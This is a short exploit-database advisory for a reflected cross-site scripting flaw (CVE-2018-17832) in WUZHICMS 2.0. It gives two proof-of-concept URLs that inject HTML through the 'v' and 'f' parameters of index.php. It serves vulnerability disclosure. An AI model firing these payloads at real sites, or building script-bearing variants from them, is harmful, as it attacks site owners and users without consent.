id: 31241
date: 10/02/2018
title: WUZHICMS 2.0 - Cross-Site Scripting Vulnerability
author: Renzi
cves: CVE-2018-17832

# Title: WUZHICMS 2.0 - Cross-Site Scripting 
# Author: Felipe "Renzi" Gabriel
# Vendor: http://www.wuzhicms.com
# Software: WUZHICMS 2.0
# CVE: CVE-2018-17832
  
# Technical Details & Description:
# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0  web-application.
# The vulnerability is located in the 'v' and  'f' parameters of the`index.php` action GET method request.
    
# PoC
 
http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>
 
http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>

#  0day.today [2023-03-22]  #